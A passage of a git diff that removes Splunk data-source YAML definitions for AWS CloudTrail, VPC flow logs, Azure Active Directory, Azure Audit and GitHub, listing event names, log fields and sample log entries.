-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml
-- event_name: AWS CloudTrail DeleteLogGroup
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml
-- event_name: AWS CloudTrail DeleteLogStream
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml
-- event_name: AWS CloudTrail DeleteLoggingConfiguration
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLoggingConfiguration.yml
-- event_name: AWS CloudTrail DeleteNetworkAclEntry
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml
-- event_name: AWS CloudTrail DeletePolicy
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml
-- event_name: AWS CloudTrail DeleteRule
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml
-- event_name: AWS CloudTrail DeleteRuleGroup
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRuleGroup.yml
-- event_name: AWS CloudTrail DeleteSnapshot
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteSnapshot.yml
-- event_name: AWS CloudTrail DeleteTrail
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml
-- event_name: AWS CloudTrail DeleteVirtualMFADevice
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml
-- event_name: AWS CloudTrail DeleteWebACL
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml
-- event_name: AWS CloudTrail DescribeEventAggregates
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml
-- event_name: AWS CloudTrail DescribeImageScanFindings
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml
-- event_name: AWS CloudTrail DescribeSnapshotAttribute
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DescribeSnapshotAttribute.yml
-- event_name: AWS CloudTrail GetAccountPasswordPolicy
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml
-- event_name: AWS CloudTrail GetObject
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml
-- event_name: AWS CloudTrail GetPasswordData
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml
-- event_name: AWS CloudTrail JobCreated
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml
-- event_name: AWS CloudTrail ModifyDBInstance
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml
-- event_name: AWS CloudTrail ModifyImageAttribute
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml
-- event_name: AWS CloudTrail ModifySnapshotAttribute
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml
-- event_name: AWS CloudTrail PutBucketAcl
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml
-- event_name: AWS CloudTrail PutBucketLifecycle
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml
-- event_name: AWS CloudTrail PutBucketReplication
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml
-- event_name: AWS CloudTrail PutBucketVersioning
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml
-- event_name: AWS CloudTrail PutImage
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml
-- event_name: AWS CloudTrail PutKeyPolicy
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml
-- event_name: AWS CloudTrail ReplaceNetworkAclEntry
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml
-- event_name: AWS CloudTrail SetDefaultPolicyVersion
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml
-- event_name: AWS CloudTrail StopLogging
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml
-- event_name: AWS CloudTrail UpdateAccountPasswordPolicy
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml
-- event_name: AWS CloudTrail UpdateLoginProfile
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml
-- event_name: AWS CloudTrail UpdateSAMLProvider
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml
-- event_name: AWS CloudTrail UpdateTrail
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- protocol
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.groupId
-- requestParameters.ipPermissions.items{}.fromPort
-- requestParameters.ipPermissions.items{}.ipProtocol
-- requestParameters.ipPermissions.items{}.ipRanges.items{}.cidrIp
-- requestParameters.ipPermissions.items{}.toPort
-- responseElements._return
-- responseElements.requestId
-- responseElements.securityGroupRuleSet.items{}.cidrIpv4
-- responseElements.securityGroupRuleSet.items{}.fromPort
-- responseElements.securityGroupRuleSet.items{}.groupId
-- responseElements.securityGroupRuleSet.items{}.groupOwnerId
-- responseElements.securityGroupRuleSet.items{}.ipProtocol
-- responseElements.securityGroupRuleSet.items{}.isEgress
-- responseElements.securityGroupRuleSet.items{}.securityGroupRuleId
-- responseElements.securityGroupRuleSet.items{}.toPort
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_ip_range
-- src_port_range
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.09", "userIdentity": {"type": "IAMUser", "principalId":
-  "AIDAAAAAAAAAAAAAAAAAA", "arn": "arn:aws:iam::111111111111:user/daftpunk_cli", "accountId":
-  "111111111111", "accessKeyId": "AKIAAAAAAAAAAAAAAAAA", "userName": "daftpunk_cli"},
-  "eventTime": "2024-02-21T19:19:40Z", "eventSource": "ec2.amazonaws.com", "eventName":
-  "AuthorizeSecurityGroupIngress", "awsRegion": "us-west-2", "sourceIPAddress": "2.2.2.2",
-  "userAgent": "aws-cli/2.13.22 Python/3.11.5 Darwin/22.5.0 source/arm64 prompt/off
-  command/ec2.authorize-security-group-ingress", "requestParameters": {"groupId":
-  "sg-07ffb1896dcd3713e", "ipPermissions": {"items": [{"ipProtocol": "-1", "fromPort":
-  -1, "toPort": -1, "groups": {}, "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]},
-  "ipv6Ranges": {}, "prefixListIds": {}}]}}, "responseElements": {"requestId": "4950930b-2129-423c-95b0-1b87c8fa115a",
-  "_return": true, "securityGroupRuleSet": {"items": [{"groupOwnerId": "111111111111",
-  "groupId": "sg-07ffb1896dcd3713e", "securityGroupRuleId": "sgr-0217c1b508cc6b76c",
-  "isEgress": false, "ipProtocol": "-1", "fromPort": -1, "toPort": -1, "cidrIpv4":
-  "0.0.0.0/0"}]}}, "requestID": "4950930b-2129-423c-95b0-1b87c8fa115a", "eventID":
-  "bdade96f-6272-468a-b084-413b9711e92f", "readOnly": false, "eventType": "AwsApiCall",
-  "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
-  "Management", "tlsDetails": {"tlsVersion": "TLSv1.3", "cipherSuite": "TLS_AES_128_GCM_SHA256",
-  "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/AWS_CloudWatchLogs_VPCflow.yml b/data_sources/cloud/AWS_CloudWatchLogs_VPCflow.yml
deleted file mode 100644
index 7ba4fc7362..0000000000
--- a/data_sources/cloud/AWS_CloudWatchLogs_VPCflow.yml
+++ /dev/null
@@ -1,66 +0,0 @@
-name: AWS CloudWatchLogs VPCflow
-id: 38a34fc4-e128-4478-a8f4-7835d51d5135
-author: Bhavin Patel, Splunk
-source: aws_cloudwatchlogs_vpcflow
-sourcetype: aws:cloudwatchlogs:vpcflow
-separator: eventName
-supported_TA:
-  name: Splunk Add-on for Amazon Web Services (AWS)
-  version: 7.4.1
-  url: https://splunkbase.splunk.com/app/1876
-event_names: []
-fields:
-- _raw
-- _time
-- account_id
-- action
-- app
-- aws_account_id
-- bytes
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_ip
-- dest_port
-- duration
-- dvc
-- end_time
-- eventtype
-- host
-- index
-- interface_id
-- linecount
-- log_status
-- packets
-- protocol
-- protocol_code
-- protocol_full_name
-- protocol_version
-- punct
-- region
-- source
-- sourcetype
-- splunk_server
-- splunk_server_group
-- src
-- src_ip
-- src_port
-- start_time
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- transport
-- user_id
-- vendor_account
-- vendor_product
-- version
-- vpcflow_action
-example_log: '2 123397614277 eni-0b0f9f261f45e6489 10.0.1.30 10.0.1.1 47254 22 17 2 98 1697608042 1697608070 ACCEPT OK'
diff --git a/data_sources/cloud/Azure_Active_Directory.yml b/data_sources/cloud/Azure_Active_Directory.yml
deleted file mode 100644
index e31309c44a..0000000000
--- a/data_sources/cloud/Azure_Active_Directory.yml
+++ /dev/null
@@ -1,180 +0,0 @@
-name: Azure Active Directory
-id: 7c12d2b2-2679-4806-b258-c17eaffbc66d
-author: Patrick Bareiss, Splunk
-source: Azure AD
-sourcetype: azure:monitor:aad
-separator: operationName
-supported_TA:
-  name: Splunk Add-on for Microsoft Cloud Services
-  version: 5.2.2
-  url: https://splunkbase.splunk.com/app/3110
-event_names:
-- event_name: Azure Active Directory
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory.yml
-- event_name: Azure Active Directory Add app role assignment to service principal
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml
-- event_name: Azure Active Directory Add member to role
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml
-- event_name: Azure Active Directory Add owner to application
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml
-- event_name: Azure Active Directory Add service principal
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml
-- event_name: Azure Active Directory Add unverified domain
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml
-- event_name: Azure Active Directory Consent to application
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml
-- event_name: Azure Active Directory Disable Strong Authentication
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml
-- event_name: Azure Active Directory Enable account
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml
-- event_name: Azure Active Directory Invite external user
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml
-- event_name: Azure Active Directory Reset password (by admin)
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml
-- event_name: Azure Active Directory Set domain authentication
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml
-- event_name: Azure Active Directory Sign-in activity
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml
-- event_name: Azure Active Directory Update application
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml
-- event_name: Azure Active Directory Update authorization policy
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml
-- event_name: Azure Active Directory Update user
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml
-- event_name: Azure Active Directory User registered security info
-  data_source: data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- identity
-- index
-- linecount
-- location
-- operationName
-- operationVersion
-- properties.alternateSignInName
-- properties.appDisplayName
-- properties.appId
-- properties.appServicePrincipalId
-- properties.authenticationDetails{}.RequestSequence
-- properties.authenticationDetails{}.StatusSequence
-- properties.authenticationDetails{}.authenticationMethod
-- properties.authenticationDetails{}.authenticationMethodDetail
-- properties.authenticationDetails{}.authenticationStepDateTime
-- properties.authenticationDetails{}.authenticationStepRequirement
-- properties.authenticationDetails{}.authenticationStepResultDetail
-- properties.authenticationDetails{}.succeeded
-- properties.authenticationProcessingDetails{}.key
-- properties.authenticationProcessingDetails{}.value
-- properties.authenticationProtocol
-- properties.authenticationRequirement
-- properties.autonomousSystemNumber
-- properties.clientAppUsed
-- properties.clientCredentialType
-- properties.conditionalAccessStatus
-- properties.correlationId
-- properties.createdDateTime
-- properties.crossTenantAccessType
-- properties.deviceDetail.deviceId
-- properties.deviceDetail.operatingSystem
-- properties.flaggedForReview
-- properties.homeTenantId
-- properties.id
-- properties.incomingTokenType
-- properties.ipAddress
-- properties.isInteractive
-- properties.isTenantRestricted
-- properties.location.city
-- properties.location.countryOrRegion
-- properties.location.geoCoordinates.latitude
-- properties.location.geoCoordinates.longitude
-- properties.location.state
-- properties.originalRequestId
-- properties.processingTimeInMilliseconds
-- properties.resourceDisplayName
-- properties.resourceId
-- properties.resourceServicePrincipalId
-- properties.resourceTenantId
-- properties.riskDetail
-- properties.riskLevelAggregated
-- properties.riskLevelDuringSignIn
-- properties.riskState
-- properties.rngcStatus
-- properties.servicePrincipalId
-- properties.signInIdentifier
-- properties.ssoExtensionVersion
-- properties.status.errorCode
-- properties.status.failureReason
-- properties.tokenIssuerName
-- properties.tokenIssuerType
-- properties.uniqueTokenIdentifier
-- properties.userAgent
-- properties.userDisplayName
-- properties.userId
-- properties.userPrincipalName
-- properties.userType
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- resultType
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-01-23T21:29:14.1490728Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
-  "operationName": "Sign-in activity", "operationVersion": "1.0", "category": "SignInLogs",
-  "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultType": "50126", "resultSignature":
-  "None", "resultDescription": "Invalid username or password or Invalid on-premise
-  username or password.", "durationMs": 0, "callerIpAddress": "35.80.10.10", "correlationId":
-  "1634ad3a-1f98-4964-add5-92fc58621944", "identity": "User30", "Level": 4, "location":
-  "US", "properties": {"id": "13148568-d61e-45eb-b38b-1fa63c106d00", "createdDateTime":
-  "2023-01-23T21:29:14.1490728+00:00", "userDisplayName": "User30", "userPrincipalName":
-  "user30@splunkresearch.com", "userId": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "appId":
-  "1b730954-1685-4b74-9bfd-dac224a7b894", "appDisplayName": "Azure Active Directory
-  PowerShell", "ipAddress": "35.80.10.10", "status": {"errorCode": 50126, "failureReason":
-  "Invalid username or password or Invalid on-premise username or password."}, "clientAppUsed":
-  "Mobile Apps and Desktop clients", "userAgent": "Mozilla/5.0 (Windows NT; Windows
-  NT 10.0; en-US) WindowsPowerShell/5.1.14393.5127", "deviceDetail": {"deviceId":
-  "", "operatingSystem": "Windows 10"}, "location": {"city": "Boardman", "state":
-  "Oregon", "countryOrRegion": "US", "geoCoordinates": {"latitude": 45.83599853515625,
-  "longitude": -119.6989974975586}}, "correlationId": "1634ad3a-1f98-4964-add5-92fc58621944",
-  "conditionalAccessStatus": "notApplied", "appliedConditionalAccessPolicies": [],
-  "authenticationContextClassReferences": [], "originalRequestId": "13148568-d61e-45eb-b38b-1fa63c106d00",
-  "isInteractive": true, "tokenIssuerName": "", "tokenIssuerType": "AzureAD", "authenticationProcessingDetails":
-  [{"key": "Legacy TLS (TLS 1.0, 1.1, 3DES)", "value": "False"}, {"key": "Is CAE Token",
-  "value": "False"}], "networkLocationDetails": [], "clientCredentialType": "none",
-  "processingTimeInMilliseconds": 47, "riskDetail": "none", "riskLevelAggregated":
-  "none", "riskLevelDuringSignIn": "none", "riskState": "none", "riskEventTypes":
-  [], "riskEventTypes_v2": [], "resourceDisplayName": "Windows Azure Active Directory",
-  "resourceId": "00000002-0000-0000-c000-000000000000", "resourceTenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e",
-  "homeTenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "authenticationDetails":
-  [{"authenticationStepDateTime": "2023-01-23T21:29:14.1490728+00:00", "authenticationMethod":
-  "Password", "authenticationMethodDetail": "Password in the cloud", "succeeded":
-  false, "authenticationStepResultDetail": "Invalid username or password or Invalid
-  on-premise username or password.", "authenticationStepRequirement": "Primary authentication",
-  "StatusSequence": 0, "RequestSequence": 1}], "authenticationRequirementPolicies":
-  [], "authenticationRequirement": "singleFactorAuthentication", "alternateSignInName":
-  "user30@splunkresearch.com", "signInIdentifier": "user30@splunkresearch.com", "servicePrincipalId":
-  "", "userType": "Member", "flaggedForReview": false, "isTenantRestricted": false,
-  "autonomousSystemNumber": 16509, "crossTenantAccessType": "none", "privateLinkDetails":
-  {}, "ssoExtensionVersion": "", "uniqueTokenIdentifier": "aIUUEx7W60Wzix-mPBBtAA",
-  "authenticationStrengths": [], "incomingTokenType": "none", "authenticationProtocol":
-  "none", "appServicePrincipalId": null, "resourceServicePrincipalId": "4d6bd7de-c9bc-45cc-b8ec-ae315f66bf77",
-  "rngcStatus": 0}}'
diff --git a/data_sources/cloud/Azure_Audit.yml b/data_sources/cloud/Azure_Audit.yml
deleted file mode 100644
index 59a9122779..0000000000
--- a/data_sources/cloud/Azure_Audit.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: Azure Audit
-id: 62e2f93e-4e9c-4d38-bb2c-6d59c4565318
-author: Patrick Bareiss, Splunk
-source: mscs:azure:audit
-sourcetype: mscs:azure:audit
-separator: operationName.localizedValue
-supported_TA:
-  name: Splunk Add-on for Microsoft Cloud Services
-  version: 5.2.2
-  url: https://splunkbase.splunk.com/app/3110
-event_names:
-- event_name: Azure Audit Create or Update an Azure Automation Runbook
-  data_source: data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml
-- event_name: Azure Audit Create or Update an Azure Automation account
-  data_source: data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml
-- event_name: Azure Audit Create or Update an Azure Automation webhook
-  data_source: data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml
diff --git a/data_sources/cloud/GitHub.yml b/data_sources/cloud/GitHub.yml
deleted file mode 100644
index ecbdbe6ff6..0000000000
--- a/data_sources/cloud/GitHub.yml
+++ /dev/null
@@ -1,205 +0,0 @@
-name: GitHub
-id: 88aa4632-3c3e-43f6-a00a-998d71f558e3
-author: Patrick Bareiss, Splunk
-source: github
-sourcetype: aws:firehose:json
-supported_TA:
-  name: Splunk Add-on for Github
-  version: 2.2.1
-  url: https://splunkbase.splunk.com/app/6254
-event_names: []
-fields:
-  - _time
-  - action
-  - host
-  - index
-  - linecount
-  - meta
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - timestamp
-  - workflow_run.actor.avatar_url
-  - workflow_run.actor.events_url
-  - workflow_run.actor.followers_url
-  - workflow_run.actor.following_url
-  - workflow_run.actor.gists_url
-  - workflow_run.actor.gravatar_id
-  - workflow_run.actor.html_url
-  - workflow_run.actor.id
-  - workflow_run.actor.login
-  - workflow_run.actor.node_id
-  - workflow_run.actor.organizations_url
-  - workflow_run.actor.received_events_url
-  - workflow_run.actor.repos_url
-  - workflow_run.actor.site_admin
-  - workflow_run.actor.starred_url
-  - workflow_run.actor.subscriptions_url
-  - workflow_run.actor.type
-  - workflow_run.actor.url
-  - workflow_run.artifacts_url
-  - workflow_run.cancel_url
-  - workflow_run.check_suite_id
-  - workflow_run.check_suite_node_id
-  - workflow_run.check_suite_url
-  - workflow_run.conclusion
-  - workflow_run.created_at
-  - workflow_run.event
-  - workflow_run.head_branch
-  - workflow_run.head_commit.author.email
-  - workflow_run.head_commit.author.name
-  - workflow_run.head_commit.committer.email
-  - workflow_run.head_commit.committer.name
-  - workflow_run.head_commit.id
-  - workflow_run.head_commit.message
-  - workflow_run.head_commit.timestamp
-  - workflow_run.head_commit.tree_id
-  - workflow_run.head_repository.collaborators_url
-  - workflow_run.head_repository.description
-  - workflow_run.head_repository.fork
-  - workflow_run.head_repository.forks_url
-  - workflow_run.head_repository.full_name
-  - workflow_run.head_repository.hooks_url
-  - workflow_run.head_repository.html_url
-  - workflow_run.head_repository.id
-  - workflow_run.head_repository.keys_url
-  - workflow_run.head_repository.name
-  - workflow_run.head_repository.node_id
-  - workflow_run.head_repository.owner.avatar_url
-  - workflow_run.head_repository.owner.events_url
-  - workflow_run.head_repository.owner.followers_url
-  - workflow_run.head_repository.owner.following_url
-  - workflow_run.head_repository.owner.gists_url
-  - workflow_run.head_repository.owner.gravatar_id
-  - workflow_run.head_repository.owner.html_url
-  - workflow_run.head_repository.owner.id
-  - workflow_run.head_repository.owner.login
-  - workflow_run.head_repository.owner.node_id
-  - workflow_run.head_repository.owner.organizations_url
-  - workflow_run.head_repository.owner.received_events_url
-  - workflow_run.head_repository.owner.repos_url
-  - workflow_run.head_repository.owner.site_admin
-  - workflow_run.head_repository.owner.starred_url
-  - workflow_run.head_repository.owner.subscriptions_url
-  - workflow_run.head_repository.owner.type
-  - workflow_run.head_repository.owner.url
-  - workflow_run.head_repository.private
-  - workflow_run.head_repository.teams_url
-  - workflow_run.head_repository.url
-  - workflow_run.head_sha
-  - workflow_run.html_url
-  - workflow_run.id
-  - workflow_run.jobs_url
-  - workflow_run.logs_url
-  - workflow_run.name
-  - workflow_run.node_id
-  - workflow_run.previous_attempt_url
-  - workflow_run.pull_requests{}.base.ref
-  - workflow_run.pull_requests{}.base.repo.id
-  - workflow_run.pull_requests{}.base.repo.name
-  - workflow_run.pull_requests{}.base.repo.url
-  - workflow_run.pull_requests{}.base.sha
-  - workflow_run.pull_requests{}.head.ref
-  - workflow_run.pull_requests{}.head.repo.id
-  - workflow_run.pull_requests{}.head.repo.name
-  - workflow_run.pull_requests{}.head.repo.url
-  - workflow_run.pull_requests{}.head.sha
-  - workflow_run.pull_requests{}.id
-  - workflow_run.pull_requests{}.number
-  - workflow_run.pull_requests{}.url
-  - workflow_run.repository.archive_url
-  - workflow_run.repository.assignees_url
-  - workflow_run.repository.blobs_url
-  - workflow_run.repository.branches_url
-  - workflow_run.repository.collaborators_url
-  - workflow_run.repository.comments_url
-  - workflow_run.repository.commits_url
-  - workflow_run.repository.compare_url
-  - workflow_run.repository.contents_url
-  - workflow_run.repository.contributors_url
-  - workflow_run.repository.deployments_url
-  - workflow_run.repository.description
-  - workflow_run.repository.downloads_url
-  - workflow_run.repository.events_url
-  - workflow_run.repository.fork
-  - workflow_run.repository.forks_url
-  - workflow_run.repository.full_name
-  - workflow_run.repository.git_commits_url
-  - workflow_run.repository.git_refs_url
-  - workflow_run.repository.git_tags_url
-  - workflow_run.repository.hooks_url
-  - workflow_run.repository.html_url
-  - workflow_run.repository.id
-  - workflow_run.repository.issue_comment_url
-  - workflow_run.repository.issue_events_url
-  - workflow_run.repository.issues_url
-  - workflow_run.repository.keys_url
-  - workflow_run.repository.labels_url
-  - workflow_run.repository.languages_url
-  - workflow_run.repository.merges_url
-  - workflow_run.repository.milestones_url
-  - workflow_run.repository.name
-  - workflow_run.repository.node_id
-  - workflow_run.repository.notifications_url
-  - workflow_run.repository.owner.avatar_url
-  - workflow_run.repository.owner.events_url
-  - workflow_run.repository.owner.followers_url
-  - workflow_run.repository.owner.following_url
-  - workflow_run.repository.owner.gists_url
-  - workflow_run.repository.owner.gravatar_id
-  - workflow_run.repository.owner.html_url
-  - workflow_run.repository.owner.id
-  - workflow_run.repository.owner.login
-  - workflow_run.repository.owner.node_id
-  - workflow_run.repository.owner.organizations_url
-  - workflow_run.repository.owner.received_events_url
-  - workflow_run.repository.owner.repos_url
-  - workflow_run.repository.owner.site_admin
-  - workflow_run.repository.owner.starred_url
-  - workflow_run.repository.owner.subscriptions_url
-  - workflow_run.repository.owner.type
-  - workflow_run.repository.owner.url
-  - workflow_run.repository.private
-  - workflow_run.repository.pulls_url
-  - workflow_run.repository.releases_url
-  - workflow_run.repository.stargazers_url
-  - workflow_run.repository.statuses_url
-  - workflow_run.repository.subscribers_url
-  - workflow_run.repository.subscription_url
-  - workflow_run.repository.tags_url
-  - workflow_run.repository.teams_url
-  - workflow_run.repository.trees_url
-  - workflow_run.repository.url
-  - workflow_run.rerun_url
-  - workflow_run.run_attempt
-  - workflow_run.run_number
-  - workflow_run.run_started_at
-  - workflow_run.status
-  - workflow_run.triggering_actor.avatar_url
-  - workflow_run.triggering_actor.events_url
-  - workflow_run.triggering_actor.followers_url
-  - workflow_run.triggering_actor.following_url
-  - workflow_run.triggering_actor.gists_url
-  - workflow_run.triggering_actor.gravatar_id
-  - workflow_run.triggering_actor.html_url
-  - workflow_run.triggering_actor.id
-  - workflow_run.triggering_actor.login
-  - workflow_run.triggering_actor.node_id
-  - workflow_run.triggering_actor.organizations_url
-  - workflow_run.triggering_actor.received_events_url
-  - workflow_run.triggering_actor.repos_url
-  - workflow_run.triggering_actor.site_admin
-  - workflow_run.triggering_actor.starred_url
-  - workflow_run.triggering_actor.subscriptions_url
-  - workflow_run.triggering_actor.type
-  - workflow_run.triggering_actor.url
-  - workflow_run.updated_at
-  - workflow_run.url
-  - workflow_run.workflow_id
-  - workflow_run.workflow_url
-example_log:
-  '{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/s